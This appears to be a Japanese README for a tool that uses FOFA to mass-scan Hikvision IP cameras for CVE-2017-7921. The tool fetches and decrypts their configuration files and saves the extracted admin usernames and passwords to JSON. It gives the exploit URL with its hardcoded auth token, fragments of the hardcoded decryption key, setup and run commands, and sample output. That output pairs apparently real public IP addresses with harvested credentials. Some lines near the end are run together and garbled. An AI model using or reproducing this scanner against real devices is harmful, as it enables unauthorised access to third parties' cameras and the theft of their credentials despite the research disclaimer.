
FOFAを利用してHikvisionのCVE-2017-7921脆弱性を迅速にテストし、ログインアカウントとパスワードを出力し、JSONファイルを出力するために使用されます。
セキュリティ声明:本ツールは、許可されたセキュリティ調査および脆弱性検証のみを目的としています。
重要:本ツールを使用することにより、以下の条項に同意したものとみなされます。
本プロジェクトは、GitHub セキュリティ研究ポリシー および Hikvision セキュリティレスポンスセンター の開示ガイドラインに従います。
Hikvision IPカメラのCVE-2017-7921認証バイパス脆弱性の一括検出・検証ツール。設定ファイルの自動復号と認証情報抽出をサポートします。
git clone https://github.com/[あなたのユーザー名]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0
ツールディレクトリに zc/ フォルダを作成し、デバイスリストをJSON形式で配置します(各行に1つのデバイスオブジェクト):
mkdir zc
ファイル例: devices_2025.json
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
フィールド説明:
python batch_decrypt.py
════════════════════════════════════════════════════════════════════════════════
Hikvisionカメラ設定ファイル脆弱性一括スキャンツール
════════════════════════════════════════════════════════════════════════════════
利用可能なJSONファイル:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45,678 バイト)
════════════════════════════════════════════════════════════════════════════════
ファイル番号を選択してください: 1
選択されたファイル: devices_2025.json
デバイスデータを読み込み中...
スキャン予定デバイス総数: 2000
並行スレッド数を入力してください (デフォルト: 5): 10
並行スレッド数: 10
スキャンを開始します...
スキャン済みデバイス総数: 2000
脆弱性発見デバイス数: 127
脆弱性デバイスは vulnerable_devices.json に保存されました。
スキャン完了後、vulnerable_devices.json が生成され、すべての脆弱性デバイスの情報が含まれます。
出力例:
[
{
"url": "http://109.50.152.186",
"config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
"username": "admin",
"password": "123456",
"city": "Lisbon",
"country": "PT",
"org": "ISP Telecom",
"status": "success"
}
]
/System/configurationFile?auth=YWRtaW46MTEK はハードコードされた認証情報を使用279977f62f6cfd2d91cd75b889ce0c9a はファームウェアにハードコード0x73, 0x8B, 0x55, 0x44)本ソフトウェアは、許可されたセキュリティ研究および教育目的のみで使用可能です。利用者は、すべての適用される法律に準拠することを自身で確認する必要があります。
最終更新:2025-01-29 | バージョン:v1.0.0 | サポートCVE:CVE-2017-7921
| フィールド | 説明 | 必須 |
|---|
link | デバイスのHTTP/HTTPSアクセスアドレス | ✅ はい |
city | 都市情報 | ❌ いいえ |
country | 国コード | ❌ いいえ |
org | 組織/ISP情報 | ❌ いいえ |